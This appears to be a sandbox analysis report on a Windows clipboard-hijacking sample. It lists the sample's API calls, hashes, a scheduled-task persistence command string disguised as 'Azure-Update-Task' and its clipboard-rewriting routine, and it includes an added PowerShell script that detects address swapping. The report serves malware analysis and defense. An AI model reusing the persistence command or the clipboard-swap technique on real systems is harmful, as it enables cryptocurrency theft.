                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                          • Instruction ID: c24a7c79a3cdb0739b6b7fca210df49940037ef47a0b32523d1896d70317d918
                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2D0123114512C77D7002AD4DC0DBDD7B1C9F05B6AF008051FB0DE9181C7709A4046E5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 00409307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                          • Opcode ID: 290b8e1962c91982bf8375fc283ed684609ad00eaa07a203bd0aa917c7852488
                                                                                                                                                                                          • Instruction ID: 555c3cc75909235c463f038e69d95b8845f3c7525ef100fa5f3fbbce69837220
                                                                                                                                                                                          • Opcode Fuzzy Hash: 290b8e1962c91982bf8375fc283ed684609ad00eaa07a203bd0aa917c7852488
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA01132088388A3C2002282A80AB823E0CC3C8A32F000020F22C020808AA2A80080AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000000,02B77B00), ref: 0041933B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                          • Opcode ID: 1aab901deb91e4522476e3ed4ad7919861da94ef2ec11d9425b62cd5ec64c2eb
                                                                                                                                                                                          • Instruction ID: 8e3655ca648fa178d482b9bc68af4478a5255a32ede4fed7c8bcd03305e8ef34
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aab901deb91e4522476e3ed4ad7919861da94ef2ec11d9425b62cd5ec64c2eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCC04C759953085FD2109B95B859B2177ACE348641F004415E50983651D66068148E55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02C614DB
                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C614ED
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,0040391C), ref: 02C61503
                                                                                                                                                                                          • PathIsDirectoryW.SHLWAPI(?), ref: 02C61510
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 02C61522
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,00403944), ref: 02C61534
                                                                                                                                                                                          • StrStrW.SHLWAPI(?,?), ref: 02C61548
                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 02C6156F
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02C61582
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$AppendDirectoryFile$CopyCreateExitFolderModuleNameProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3994694214-0
                                                                                                                                                                                          • Opcode ID: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction ID: 3de5a8549df4787d0cf27699b133264310d9f886743f6be2798c4c73239cdb56
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A110DB2500229ABCB60DFA0DD4CEDB7B6CAB45316F0401A1A36AF2061EB7497C49F64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0041431D
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00414334
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00420BEC), ref: 0041433F
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0041435D
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00414364
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2579439406-0
• Opcode ID: b5ed279ea4a4dab34c54404148aadcebec64625d945cb77831002f59ee24622b
• Instruction ID: 3b85324b25fa6e122bcd8d2fd14b9e1c915bf2a8df4e9c43ea8155ef528145f4
• Opcode Fuzzy Hash: b5ed279ea4a4dab34c54404148aadcebec64625d945cb77831002f59ee24622b
• Instruction Fuzzy Hash: 902124B8910B089BD300EF65FC486897BB4FB58390F81607AEC1987361E3B40681CF8D
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(004036C8), ref: 02C6125B
• LoadLibraryW.KERNEL32(0040370C), ref: 02C61291
• LoadLibraryW.KERNEL32(00403720), ref: 02C6129F
• LoadLibraryW.KERNEL32(00403738), ref: 02C612AC
• LoadLibraryW.KERNEL32(0040374C), ref: 02C612B9
• LoadLibraryW.KERNEL32(00403738), ref: 02C612C7
• GetProcAddress.KERNEL32(?,00403788), ref: 02C612F2
• GetProcAddress.KERNEL32(?,0040379C), ref: 02C61303
• GetProcAddress.KERNEL32(?,004037A8), ref: 02C61314
• GetProcAddress.KERNEL32(?,004037B4), ref: 02C61325
• GetProcAddress.KERNEL32(?,004037C0), ref: 02C61336
• GetProcAddress.KERNEL32(?,004037D0), ref: 02C61347
• GetProcAddress.KERNEL32(?,004037DC), ref: 02C61358
• GetProcAddress.KERNEL32(?,004037E8), ref: 02C61369
• GetProcAddress.KERNEL32(?,004037F4), ref: 02C6137D
• GetProcAddress.KERNEL32(?,004037FC), ref: 02C6138E
• GetProcAddress.KERNEL32(?,00403804), ref: 02C6139F
• GetProcAddress.KERNEL32(?,00403810), ref: 02C613AB
• GetProcAddress.KERNEL32(?,0040381C), ref: 02C613B7
• GetProcAddress.KERNEL32(00000000,00403830), ref: 02C613C8
• GetProcAddress.KERNEL32(?,00403840), ref: 02C613D7
• GetProcAddress.KERNEL32(?,0040384C), ref: 02C613E3
• GetProcAddress.KERNEL32(?,0040385C), ref: 02C613EF
• GetProcAddress.KERNEL32(?,0040386C), ref: 02C61400
• GetProcAddress.KERNEL32(00000000,0040387C), ref: 02C61411
• GetProcAddress.KERNEL32(?,00403890), ref: 02C6141D
• GetProcAddress.KERNEL32(?,0040389C), ref: 02C61431
• GetProcAddress.KERNEL32(?,004038AC), ref: 02C61440
• GetProcAddress.KERNEL32(?,004038B4), ref: 02C61451
• GetProcAddress.KERNEL32(?,004038BC), ref: 02C6145D
• GetProcAddress.KERNEL32(?,004038C4), ref: 02C6146E
• GetProcAddress.KERNEL32(?,004038D4), ref: 02C6147F
• GetProcAddress.KERNEL32(?,004038E8), ref: 02C61490
• GetProcAddress.KERNEL32(?,004038F8), ref: 02C614A1
• GetProcAddress.KERNEL32(?,0040390C), ref: 02C614B2
Memory Dump Source
• Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID:
• API String ID: 2238633743-0
• Opcode ID: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
• Instruction ID: 810410d84f07510b68d2279596a66a4244035fbafc9fc8d3546152a8dc498d68
• Opcode Fuzzy Hash: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
• Instruction Fuzzy Hash: 9451A9F2951310BBC7007FB5AE4DA8A7EFCAA8974771184B7B305F31A1D6B892448B5C
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
• String ID: -$9
• API String ID: 3451365851-1631151375
• Opcode ID: 1a9a09d93578db34f9c0d612a98667e564935c5bb814d1e3d5b61f6c27d3800b
• Instruction ID: 653ea854a318213682fef8ef0d7c2510b134a99a2165e43a47bb046c5770e462
• Opcode Fuzzy Hash: 1a9a09d93578db34f9c0d612a98667e564935c5bb814d1e3d5b61f6c27d3800b
• Instruction Fuzzy Hash: 57F138B1D052298FDB24CF58CC89BEEB7B1BB48304F10819AE409A7291D7789EC0CF59
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
• String ID: 9
• API String ID: 3455034128-2366072709
• Opcode ID: 4fcff20f53753deb092c499b28c604d23a3b997073a29a194913335518047743
• Instruction ID: 44260cf9f1c9588520b15a15453b67d017e9ba5cfde90ac40a21584d8801aa82
• Opcode Fuzzy Hash: 4fcff20f53753deb092c499b28c604d23a3b997073a29a194913335518047743
• Instruction Fuzzy Hash: B6F15FF1D042199FDB24CF54CC85BAEB7B5BB45304F1484AAE609B7281D738AE84CF5A
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.NTDLL ref: 02C6159F
• memset.NTDLL ref: 02C615AF
• LocalAlloc.KERNEL32(00000040,00000308), ref: 02C615BF
  • Part of subcall function 02C61FCC: lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FE2
  • Part of subcall function 02C61FCC: lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FEF
  • Part of subcall function 02C61FCC: LocalAlloc.KERNEL32(00000040,00000001,?,02C615D5), ref: 02C62000
  • Part of subcall function 02C61FCC: GlobalFree.KERNEL32(?), ref: 02C62021
• CreateProcessW.KERNEL32(004039E8,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02C61621
• LocalFree.KERNEL32(?), ref: 02C61630
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C6163F
• LocalFree.KERNEL32(?), ref: 02C6165A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: Local$Free$Alloclstrlenmemset$CreateGlobalObjectProcessSingleWait
• String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$9@
• API String ID: 3199137260-561363415
• Opcode ID: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
• Instruction ID: 02738a5c6a7977df94ccd5fe5479601067bb0b0f3358b419eaace194af235466
• Opcode Fuzzy Hash: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
• Instruction Fuzzy Hash: 7221A4B5900109BFD710EFA4DD89EAF7F7DEB80756F240035B605B6294DBB09F009A69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(004036C8), ref: 02C6125B
  • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(0040370C), ref: 02C61291
  • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403720), ref: 02C6129F
  • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403738), ref: 02C612AC
  • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(0040374C), ref: 02C612B9
  • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403738), ref: 02C612C7
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403788), ref: 02C612F2
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,0040379C), ref: 02C61303
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037A8), ref: 02C61314
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037B4), ref: 02C61325
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037C0), ref: 02C61336
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037D0), ref: 02C61347
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037DC), ref: 02C61358
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037E8), ref: 02C61369
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037F4), ref: 02C6137D
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037FC), ref: 02C6138E
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403804), ref: 02C6139F
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403810), ref: 02C613AB
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,0040381C), ref: 02C613B7
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(00000000,00403830), ref: 02C613C8
  • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403840), ref: 02C613D7
• CreateMutexW.KERNEL32(00000000,00000000,00403030), ref: 02C61DDE
• GetLastError.KERNEL32 ref: 02C61DE4
• ExitProcess.KERNEL32 ref: 02C61DF3
• lstrlenW.KERNEL32(00000000), ref: 02C61E14
• LocalAlloc.KERNEL32(00000040,00000000), ref: 02C61E26
• LocalAlloc.KERNEL32(00000040,?,?), ref: 02C61E8A
• lstrlenW.KERNEL32(?,?), ref: 02C61EE9
• LocalFree.KERNEL32(?), ref: 02C61F04
• lstrlenW.KERNEL32(?,?), ref: 02C61F0D
• LocalFree.KERNEL32(?), ref: 02C61F20
• Sleep.KERNEL32(000000E1), ref: 02C61F2B
Memory Dump Source
• Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$Local$lstrlen$AllocFree$CreateErrorExitLastMutexProcessSleep
• String ID:
• API String ID: 3526352376-0
• Opcode ID: 347b62e39c1b5feb9e8dd141994958ff6feaa20621b2d653af5b8c2ba136f58b
                                                                                                                                                                                          • Instruction ID: b16e5c85db634e8ba305d63882d9492b6c12e3d3e653d406712b48766dbd8b58
                                                                                                                                                                                          • Opcode Fuzzy Hash: 347b62e39c1b5feb9e8dd141994958ff6feaa20621b2d653af5b8c2ba136f58b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C416F75900215ABCB219FE4C98C67EBAF5BF88307F180025E645F3360DBB4DA019B55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A0C
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(00421E80,00421E70,00000000,00421E30), ref: 00419A2C
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A32
                                                                                                                                                                                          • GetNumberFormatA.KERNEL32(00000000,00000000,00421E90,00000000,?,00000000), ref: 00419A58
                                                                                                                                                                                          • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00419A69
                                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 00419A6F
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 00419A77
                                                                                                                                                                                          • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00419A81
                                                                                                                                                                                          • CreateNamedPipeA.KERNEL32(00421EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419AF1
                                                                                                                                                                                          • GetBinaryType.KERNEL32(00421ED0,?), ref: 00419B49
                                                                                                                                                                                          • HeapDestroy.KERNEL32(00000000), ref: 00419B51
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorInfoLast$BinaryCommandCreateDestroyFileFormatHeapLineNameNamedNumberPipePrivateProfileShortStartupType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3242046743-0
                                                                                                                                                                                          • Opcode ID: 7c5cb30a4695b971b029f1528554ae09b201add16f0ae535992b7a0b0ca3f754
                                                                                                                                                                                          • Instruction ID: 01657f5c00476ba7faca39b10de3ba90de21ef6b07a221bae3b0a22fecd08fed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c5cb30a4695b971b029f1528554ae09b201add16f0ae535992b7a0b0ca3f754
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31B070A44214DFE720DF90EC29BE97B71FB48349F1082AAF10566190CBB92D98DF1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$_write_string$__aulldiv__aullrem__mbtowc_l
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 306235055-2366072709
                                                                                                                                                                                          • Opcode ID: 20bd4080c8e660b2b765e9eaec09d05692696ac55142104f97c21983c69165a8
                                                                                                                                                                                          • Instruction ID: 4d1ee3b5c3b669ca86b3b2560db9b9e2486537ce75942733b24cdf4f3669aa82
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20bd4080c8e660b2b765e9eaec09d05692696ac55142104f97c21983c69165a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FC11AB1D002299FDB14CF98C881BAEB7B5FF84304F1541A9E60AB7281D7385E91CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__get_printf_count_output_get_int_arg_wctomb_s_write_string
                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                          • API String ID: 532768033-2547889144
                                                                                                                                                                                          • Opcode ID: 85c6db6edcee3a764261b9dadb276df4ee325cc57f35f31d4818c573b552330a
                                                                                                                                                                                          • Instruction ID: 445fecfb2395e1bc81349e7a00bdb9547341c29de4ea7dfb4c7d74514e35de85
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85c6db6edcee3a764261b9dadb276df4ee325cc57f35f31d4818c573b552330a
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7A180B0D052298BEF20DF54CC49BEEB7B1AB48304F1441DAE518BA291D7B99EC0CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                          • API String ID: 2232461714-2547889144
                                                                                                                                                                                          • Opcode ID: d0d823aee03a34b056043af3defca92891557a7d9fe23642221d1551105c16b1
                                                                                                                                                                                          • Instruction ID: 101e3251ec34b98fd8c90ff1df4b4bcaf2cc239290caa32785a8a7b5b6a31c4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0d823aee03a34b056043af3defca92891557a7d9fe23642221d1551105c16b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA17A70D012288BDB64CF54CC89BEEB7B1BB48304F1481DAE519AB291D7B99EC0CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,02C61F1D), ref: 02C61D36
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 02C61D41
                                                                                                                                                                                          • memcpy.NTDLL(00000000), ref: 02C61D48
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 02C61D52
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 02C61D5A
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 02C61D64
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 02C61D6D
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 02C61D73
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 02C61D7A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWirememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2518647738-0
                                                                                                                                                                                          • Opcode ID: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                                                                                                                                                                                          • Instruction ID: 5db496f50071b2cf3005acbee94e554ebba1e03153c434a0a1f51f80c665fd9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0DAF6601110ABE2002BB5BE8DB6B3E6CEBC9757F050535B306F51A1CA7484048778
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
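The two listings from the 02C60000 dump (the loop at 02C61DE4-02C61F2B that allocates with LocalAlloc(0x40 = LPTR), measures text with lstrlenW and sleeps for 0xE1 = 225 ms each pass, and the routine at 02C61D36-02C61D7A that copies a buffer into a GlobalAlloc(0x2 = GMEM_MOVEABLE) block and pushes it through OpenClipboard(NULL) / EmptyClipboard / SetClipboardData(0xD = CF_UNICODETEXT)) are the write half of a clipboard hijacker: poll the clipboard, and when it holds something that looks like a wallet address, replace it. The following PowerShell is an added triage check for a suspect host and is not code from this report or from the sample. It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows (Get-Clipboard / Set-Clipboard); the probe values are public test vectors or format-valid placeholders constructed for the example, and the address regexes and the function names Test-ClipboardSwap and Watch-ClipboardSwaps are the example's own.

```powershell
# Added example (not from the sandbox report or the sample): live-host check
# for a clipboard-swapping hijacker of the kind the API listings describe.
# Requires Get-Clipboard / Set-Clipboard (Windows PowerShell 5.1+ / PS 7 on Windows).

# Probe values: real address *formats* so a format-keyed hijacker fires, but
# public test vectors / placeholders, so nothing of value is exposed.
# (Constructed input for this example.)
$Probes = [ordered]@{
    'BTC P2PKH'  = '1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2'          # Bitcoin wiki example address
    'BTC bech32' = 'bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq'  # BIP-173 test vector
    'ETH'        = '0x0000000000000000000000000000000000000001'  # format-valid placeholder
}

# Address shapes used by Watch-ClipboardSwaps to decide whether a change looks
# like an address-for-address substitution (example's own patterns).
$AddressPatterns = @(
    '^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$',   # BTC P2PKH / P2SH (base58)
    '^bc1[a-z0-9]{25,90}$',                # BTC bech32
    '^0x[0-9a-fA-F]{40}$'                  # ETH
)

function Test-ClipboardSwap {
    # Active probe: plant one value, wait longer than the sample's 225 ms poll
    # interval, read it back. Any difference means something rewrote it.
    param([string]$Label, [string]$Value, [int]$WaitMs = 1000)
    Set-Clipboard -Value $Value
    Start-Sleep -Milliseconds $WaitMs
    $after = Get-Clipboard -Raw
    if ($null -ne $after) { $after = $after.Trim() }
    [pscustomobject]@{
        Label    = $Label
        Planted  = $Value
        ReadBack = $after
        Swapped  = ($after -ne $Value)
    }
}

function Watch-ClipboardSwaps {
    # Passive mode: poll for $Seconds and report every clipboard change where an
    # address-shaped string is replaced by a *different* address-shaped string.
    # A user copying a second address also triggers this, so treat hits as
    # leads; the active probe is the decisive test.
    param([int]$Seconds = 60, [int]$IntervalMs = 200)
    $deadline = (Get-Date).AddSeconds($Seconds)
    $last = Get-Clipboard -Raw
    while ((Get-Date) -lt $deadline) {
        Start-Sleep -Milliseconds $IntervalMs
        $now = Get-Clipboard -Raw
        if ($now -ne $last) {
            $oldIsAddr = $AddressPatterns | Where-Object { $last -and ($last.Trim() -match $_) }
            $newIsAddr = $AddressPatterns | Where-Object { $now  -and ($now.Trim()  -match $_) }
            if ($oldIsAddr -and $newIsAddr) {
                "{0:HH:mm:ss.fff} address replaced: {1} -> {2}" -f (Get-Date), $last.Trim(), $now.Trim()
            }
            $last = $now
        }
    }
}

# --- Active probe ------------------------------------------------------------
$results = foreach ($k in $Probes.Keys) { Test-ClipboardSwap -Label $k -Value $Probes[$k] }
$results | Format-Table -AutoSize

$hits = $results | Where-Object Swapped
if ($hits) {
    Write-Warning "Clipboard content was rewritten within 1 s of being set: a clipboard hijacker is active."
    # The sample calls OpenClipboard(NULL), so EmptyClipboard leaves the clipboard
    # owner NULL and GetClipboardOwner() cannot attribute the write to a window.
    # Pivot on the replacement strings instead: they are the attacker's receiving
    # addresses and make good IOCs for the rest of the fleet.
    $hits | ForEach-Object { "  {0}: planted {1}, got back {2}" -f $_.Label, $_.Planted, $_.ReadBack }
} else {
    "No swap observed. Run Watch-ClipboardSwaps -Seconds 60 for passive monitoring if the host is still suspect."
}
```

The 1 s wait is deliberate: the listing shows a fixed Sleep(0xE1) between passes, so a single-second window covers several polling cycles and a swap will already have happened when the value is read back. Because the sample opens the clipboard with a NULL window handle, owner-based attribution does not work; the substituted address is the artefact to pivot on, together with the process and scheduled task the report records elsewhere.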

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00421EEC), ref: 00419B70
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 00419B7F
                                                                                                                                                                                          • SetSystemTime.KERNEL32(00000000), ref: 00419B87
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00419B98
                                                                                                                                                                                          • FreeLibraryAndExitThread.KERNEL32(00000000,00000000), ref: 00419BA2
                                                                                                                                                                                          • FindFirstChangeNotificationA.KERNEL32(00421EFC,00000000,00000000), ref: 00419BB1
                                                                                                                                                                                          • LCMapStringA.KERNEL32(00000000,00000000,00421F1C,00000000,?,00000000), ref: 00419BCB
                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000), ref: 00419BD3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$ChangeCurrentDirectoryExitFileFindFirstFreeLoadModuleNameNotificationStringSystemThreadTimeValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1784048794-0
                                                                                                                                                                                          • Opcode ID: 0af3889749f43eeecc148a883a65a84b529d05b0c956aced57ee8f991bc1cdc1
                                                                                                                                                                                          • Instruction ID: e589456b1699ab58c567d739c912f2cf862097d719ddb17d9b21405fbe78bbf5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0af3889749f43eeecc148a883a65a84b529d05b0c956aced57ee8f991bc1cdc1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3601EC35394308AFE7509BE0AC0AFDA7B24EB0DB02F508055FB1DD90E0DBE41584CBAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
